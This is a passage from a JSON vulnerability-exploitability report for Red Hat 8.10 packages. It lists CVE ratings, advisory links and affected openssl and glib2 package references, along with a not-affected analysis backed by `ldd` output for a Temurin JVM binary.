          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-69421",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        476
      ],
      "description": "Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer\ndereference in the PKCS12_item_decrypt_d2i_ex() function.\n\nImpact summary: A NULL pointer dereference can trigger a crash which leads to\nDenial of Service for an application processing PKCS#12 files.\n\nThe PKCS12_item_decrypt_d2i_ex() function does not check whether the oct\nparameter is NULL before dereferencing it. When called from\nPKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can\nbe NULL, causing a crash. The vulnerability is limited to Denial of Service\nand cannot be escalated to achieve code execution or memory disclosure.\n\nExploiting this issue requires an attacker to provide a malformed PKCS#12 file\nto an application that processes it. For that reason the issue was assessed as\nLow severity according to our Security Policy.\n\nThe FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,\nas the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.\n\nOpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-69421"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:1473"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-69421"
        },
        {
          "url": "https://bugzilla.redhat.com/2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/2430390"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430375"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430376"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430377"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430378"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430379"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430380"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430381"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430386"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430387"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430388"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430389"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2430390"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-1473.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:1473"
        },
        {
          "url": "https://github.com/advisories/GHSA-w9rv-xc8m-cmqp"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-69421.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50081.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69421"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20260127.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7980-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-69421"
        }
      ],
      "published": "2026-01-27T16:16:34+00:00",
      "updated": "2026-06-17T10:00:40+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1",
          "versions": [
            {
              "version": "1:1.1.1k-17.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl-libs@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/openssl@1.1.1k-17.el8_6?arch=x86_64&distro=redhat-8.10&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-7039",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-7039"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-7039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
        }
      ],
      "published": "2025-09-03T02:15:38+00:00",
      "updated": "2026-06-17T10:04:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.56.4-170.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/glib2@2.56.4-170.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
